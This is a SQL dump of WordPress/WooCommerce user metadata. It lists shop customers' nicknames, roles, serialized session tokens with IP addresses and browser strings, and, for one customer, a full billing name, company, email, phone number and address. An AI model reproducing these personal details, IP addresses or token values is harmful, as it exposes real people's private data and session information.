INSERT INTO `wp_usermeta` VALUES (15547, 1023, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15548, 1023, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15549, 1023, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15550, 1023, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15551, 1023, '_yoast_wpseo_profile_updated', '1494764082'); 
INSERT INTO `wp_usermeta` VALUES (15552, 1023, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (15553, 1024, 'nickname', 'jamie.aulert2008'); 
INSERT INTO `wp_usermeta` VALUES (15554, 1024, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15555, 1024, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15556, 1024, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15557, 1024, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15558, 1024, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15559, 1024, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15560, 1024, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15561, 1024, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15562, 1024, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15563, 1024, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15564, 1024, '_yoast_wpseo_profile_updated', '1494798983'); 
INSERT INTO `wp_usermeta` VALUES (15565, 1024, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (15566, 1025, 'nickname', 'carmelcup1962'); 
INSERT INTO `wp_usermeta` VALUES (15567, 1025, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15568, 1025, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15569, 1025, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15570, 1025, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15571, 1025, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15572, 1025, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15573, 1025, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15574, 1025, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15575, 1025, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15576, 1025, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15577, 1025, '_yoast_wpseo_profile_updated', '1494825038'); 
INSERT INTO `wp_usermeta` VALUES (15578, 1025, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (15579, 806, 'last_update', '1494835413'); 
INSERT INTO `wp_usermeta` VALUES (15580, 1026, 'nickname', 'msds'); 
INSERT INTO `wp_usermeta` VALUES (15581, 1026, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15582, 1026, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15583, 1026, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15584, 1026, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15585, 1026, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15586, 1026, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15587, 1026, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15588, 1026, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15589, 1026, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15590, 1026, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15591, 1026, '_yoast_wpseo_profile_updated', '1494848867'); 
INSERT INTO `wp_usermeta` VALUES (15592, 1026, 'session_tokens', 'a:1:{s:64:"a38b66bceed080feb4010003b3956f7890550058dbeb069fd11471e0897fdde1";a:4:{s:10:"expiration";i:1496058477;s:2:"ip";s:14:"115.248.29.163";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1494848877;}}'); 
INSERT INTO `wp_usermeta` VALUES (15593, 1027, 'nickname', 'Andrea.Craven'); 
INSERT INTO `wp_usermeta` VALUES (15594, 1027, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15595, 1027, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15596, 1027, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15597, 1027, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15598, 1027, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15599, 1027, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15600, 1027, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15601, 1027, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15602, 1027, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15603, 1027, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15604, 1027, '_yoast_wpseo_profile_updated', '1494854328'); 
INSERT INTO `wp_usermeta` VALUES (15605, 1027, 'session_tokens', 'a:1:{s:64:"97ce404eb15f118df7dd39349e634c3d0f10b4fdba7f4026ec02148bea0c5699";a:4:{s:10:"expiration";i:1496063938;s:2:"ip";s:13:"68.71.164.110";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36";s:5:"login";i:1494854338;}}'); 
INSERT INTO `wp_usermeta` VALUES (15606, 1027, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (15607, 1028, 'nickname', 'jeanne.falloncarine'); 
INSERT INTO `wp_usermeta` VALUES (15608, 1028, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15609, 1028, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15610, 1028, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15611, 1028, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15612, 1028, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15613, 1028, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15614, 1028, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15615, 1028, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15616, 1028, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15617, 1028, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15618, 1028, '_yoast_wpseo_profile_updated', '1494863647'); 
INSERT INTO `wp_usermeta` VALUES (15619, 1028, 'session_tokens', 'a:1:{s:64:"e0a32fad3dfa53f538fc2b215ef1bf6dadd41b44520fd288aabfd350b4c19e19";a:4:{s:10:"expiration";i:1496073256;s:2:"ip";s:13:"165.156.40.17";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1494863656;}}'); 
INSERT INTO `wp_usermeta` VALUES (15620, 1029, 'nickname', 'melaniem'); 
INSERT INTO `wp_usermeta` VALUES (15621, 1029, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15622, 1029, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15623, 1029, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15624, 1029, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15625, 1029, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15626, 1029, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15627, 1029, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15628, 1029, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15629, 1029, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15630, 1029, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15631, 1029, '_yoast_wpseo_profile_updated', '1494864349'); 
INSERT INTO `wp_usermeta` VALUES (15632, 1029, 'session_tokens', 'a:2:{s:64:"1c52927d1c7a4b21a2070ea4a2ba52e41980310c7971d0d86dd70fc45a560e34";a:4:{s:10:"expiration";i:1496073958;s:2:"ip";s:14:"99.255.106.177";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1494864358;}s:64:"5ee886acfca9e2e868db400a8f0704e1b5b9b53e475128f901057aed9f3aa81e";a:4:{s:10:"expiration";i:1495113867;s:2:"ip";s:14:"99.255.106.177";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36";s:5:"login";i:1494941067;}}'); 
INSERT INTO `wp_usermeta` VALUES (15633, 1030, 'nickname', 'jpigatti1962'); 
INSERT INTO `wp_usermeta` VALUES (15634, 1030, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15635, 1030, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15636, 1030, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15637, 1030, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15638, 1030, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15639, 1030, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15640, 1030, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15641, 1030, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15642, 1030, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15643, 1030, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15644, 1030, '_yoast_wpseo_profile_updated', '1494867191'); 
INSERT INTO `wp_usermeta` VALUES (15645, 1030, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (15646, 1031, 'nickname', 'amanda.cuer'); 
INSERT INTO `wp_usermeta` VALUES (15647, 1031, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15648, 1031, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15649, 1031, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15650, 1031, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15651, 1031, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15652, 1031, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15653, 1031, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15654, 1031, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15655, 1031, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15656, 1031, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15657, 1031, '_yoast_wpseo_profile_updated', '1494867328'); 
INSERT INTO `wp_usermeta` VALUES (15658, 1031, 'session_tokens', 'a:1:{s:64:"61637b4eac93898ce79f6ecfe2df0149feee6f7ef9cae03f864ebaaa3d5d7963";a:4:{s:10:"expiration";i:1496076936;s:2:"ip";s:13:"68.71.164.110";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36";s:5:"login";i:1494867336;}}'); 
INSERT INTO `wp_usermeta` VALUES (15659, 1031, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (15660, 1032, 'nickname', 'michael.barnes'); 
INSERT INTO `wp_usermeta` VALUES (15661, 1032, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15662, 1032, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15663, 1032, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15664, 1032, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15665, 1032, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15666, 1032, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15667, 1032, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15668, 1032, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15669, 1032, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15670, 1032, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15671, 1032, '_yoast_wpseo_profile_updated', '1494873324'); 
INSERT INTO `wp_usermeta` VALUES (15672, 1032, 'session_tokens', 'a:1:{s:64:"8d056e6a30e39f22f21aa2bc0a66ad5128b6157dc37d409a505df58a88f0f2e6";a:4:{s:10:"expiration";i:1496082933;s:2:"ip";s:15:"132.246.119.196";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1494873333;}}'); 
INSERT INTO `wp_usermeta` VALUES (15673, 1033, 'nickname', 'rsmsing1950'); 
INSERT INTO `wp_usermeta` VALUES (15674, 1033, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15675, 1033, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15676, 1033, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15677, 1033, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15678, 1033, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15679, 1033, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15680, 1033, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15681, 1033, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15682, 1033, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15683, 1033, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15684, 1033, '_yoast_wpseo_profile_updated', '1494874696'); 
INSERT INTO `wp_usermeta` VALUES (15685, 1033, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (15686, 1034, 'nickname', 'slstewart'); 
INSERT INTO `wp_usermeta` VALUES (15687, 1034, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15688, 1034, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15689, 1034, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15690, 1034, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15691, 1034, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15692, 1034, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15693, 1034, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15694, 1034, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15695, 1034, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15696, 1034, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15697, 1034, '_yoast_wpseo_profile_updated', '1494876794'); 
INSERT INTO `wp_usermeta` VALUES (15698, 1034, 'session_tokens', 'a:1:{s:64:"a36503854eee7264070d6292a3e432a30c239245817d4a418ecbbc5b34030cbc";a:4:{s:10:"expiration";i:1496086402;s:2:"ip";s:11:"76.70.24.31";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36";s:5:"login";i:1494876802;}}'); 
INSERT INTO `wp_usermeta` VALUES (15699, 1035, 'nickname', 'jack'); 
INSERT INTO `wp_usermeta` VALUES (15700, 1035, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15701, 1035, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15702, 1035, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15703, 1035, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15704, 1035, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15705, 1035, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15706, 1035, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15707, 1035, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15708, 1035, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15709, 1035, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15710, 1035, '_yoast_wpseo_profile_updated', '1494891613'); 
INSERT INTO `wp_usermeta` VALUES (15711, 1035, 'session_tokens', 'a:1:{s:64:"e2500a53a234f8ffad13efb5aa73dcab4fefe0eda316c75e92e0b55a12c8fe04";a:4:{s:10:"expiration";i:1503572887;s:2:"ip";s:14:"117.120.16.133";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36";s:5:"login";i:1503400087;}}'); 
INSERT INTO `wp_usermeta` VALUES (15712, 1035, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (15713, 1036, 'nickname', 'awilson'); 
INSERT INTO `wp_usermeta` VALUES (15714, 1036, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15715, 1036, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15716, 1036, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15717, 1036, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15718, 1036, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15719, 1036, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15720, 1036, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15721, 1036, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15722, 1036, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15723, 1036, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15724, 1036, '_yoast_wpseo_profile_updated', '1494892038'); 
INSERT INTO `wp_usermeta` VALUES (15725, 1036, 'session_tokens', 'a:1:{s:64:"18ef13146bb32bb417a9c487982eac0e80c3499506479cfed09f8a9e4738064f";a:4:{s:10:"expiration";i:1496101646;s:2:"ip";s:15:"151.112.132.231";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0";s:5:"login";i:1494892046;}}'); 
INSERT INTO `wp_usermeta` VALUES (15726, 1036, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (15727, 1037, 'nickname', 'yvonne'); 
INSERT INTO `wp_usermeta` VALUES (15728, 1037, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15729, 1037, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15730, 1037, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15731, 1037, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15732, 1037, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15733, 1037, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15734, 1037, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15735, 1037, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15736, 1037, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15737, 1037, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15738, 1037, '_yoast_wpseo_profile_updated', '1494912889'); 
INSERT INTO `wp_usermeta` VALUES (15739, 1037, 'session_tokens', 'a:1:{s:64:"9da156ee46ae63ebf3d3d982671da2882d6a04f901cc7f877d22ebf2d8bc6c82";a:4:{s:10:"expiration";i:1496122499;s:2:"ip";s:15:"113.108.109.132";s:2:"ua";s:107:"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3088.3 Safari/537.36";s:5:"login";i:1494912899;}}'); 
INSERT INTO `wp_usermeta` VALUES (15740, 1038, 'nickname', 'akaraer'); 
INSERT INTO `wp_usermeta` VALUES (15741, 1038, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15742, 1038, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15743, 1038, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15744, 1038, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15745, 1038, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15746, 1038, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15747, 1038, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15748, 1038, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15749, 1038, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15750, 1038, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15751, 1038, '_yoast_wpseo_profile_updated', '1494919976'); 
INSERT INTO `wp_usermeta` VALUES (15752, 1038, 'session_tokens', 'a:1:{s:64:"2440fe6fbbb1144f8f82ebe8b856bdf43cfd3dd7f5f829ae388d9d45eb1864f7";a:4:{s:10:"expiration";i:1496129586;s:2:"ip";s:11:"92.45.88.58";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36";s:5:"login";i:1494919986;}}'); 
INSERT INTO `wp_usermeta` VALUES (15753, 1038, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (15754, 1039, 'nickname', 'almndjoy1965'); 
INSERT INTO `wp_usermeta` VALUES (15755, 1039, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15756, 1039, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15757, 1039, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15758, 1039, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15759, 1039, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15760, 1039, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15761, 1039, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15762, 1039, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15763, 1039, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15764, 1039, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15765, 1039, '_yoast_wpseo_profile_updated', '1494926547'); 
INSERT INTO `wp_usermeta` VALUES (15766, 1039, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (15767, 1040, 'nickname', 'evilla591958'); 
INSERT INTO `wp_usermeta` VALUES (15768, 1040, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15769, 1040, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15770, 1040, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15771, 1040, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15772, 1040, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15773, 1040, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15774, 1040, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15775, 1040, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15776, 1040, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15777, 1040, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15778, 1040, '_yoast_wpseo_profile_updated', '1494929941'); 
INSERT INTO `wp_usermeta` VALUES (15779, 1040, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (15780, 1029, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (15781, 1029, 'billing_first_name', 'Accounts'); 
INSERT INTO `wp_usermeta` VALUES (15782, 1029, 'billing_last_name', 'Payable'); 
INSERT INTO `wp_usermeta` VALUES (15783, 1029, 'billing_company', 'Aurora Scientific Inc.'); 
INSERT INTO `wp_usermeta` VALUES (15784, 1029, 'billing_email', 'melaniem@aurorascientific.com'); 
INSERT INTO `wp_usermeta` VALUES (15785, 1029, 'billing_phone', '905 727-5161'); 
INSERT INTO `wp_usermeta` VALUES (15786, 1029, 'billing_country', 'CA'); 
INSERT INTO `wp_usermeta` VALUES (15787, 1029, 'billing_address_1', '25 Industry Street'); 
INSERT INTO `wp_usermeta` VALUES (15788, 1029, 'billing_address_2', 'Unit 1'); 
INSERT INTO `wp_usermeta` VALUES (15789, 1029, 'billing_city', 'Aurora'); 
INSERT INTO `wp_usermeta` VALUES (15790, 1029, 'billing_state', 'ON'); 
INSERT INTO `wp_usermeta` VALUES (15791, 1029, 'billing_postcode', 'L4G 1X6'); 
INSERT INTO `wp_usermeta` VALUES (15792, 1041, 'nickname', 'caroline.machado'); 
INSERT INTO `wp_usermeta` VALUES (15793, 1041, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15794, 1041, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15795, 1041, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15796, 1041, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15797, 1041, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15798, 1041, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15799, 1041, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15800, 1041, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15801, 1041, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15802, 1041, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15803, 1041, '_yoast_wpseo_profile_updated', '1494941338'); 
INSERT INTO `wp_usermeta` VALUES (15804, 1041, 'session_tokens', 'a:1:{s:64:"18dee98a48512b53b15ab2a7e65f0dc0715d41a09337786201900c10d2be0d75";a:4:{s:10:"expiration";i:1496150948;s:2:"ip";s:13:"165.156.39.22";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36";s:5:"login";i:1494941348;}}'); 
INSERT INTO `wp_usermeta` VALUES (15805, 1042, 'nickname', 'edmund'); 
INSERT INTO `wp_usermeta` VALUES (15806, 1042, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15807, 1042, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15808, 1042, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15809, 1042, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15810, 1042, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15811, 1042, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15812, 1042, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15813, 1042, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15814, 1042, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15815, 1042, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15816, 1042, '_yoast_wpseo_profile_updated', '1494944704'); 
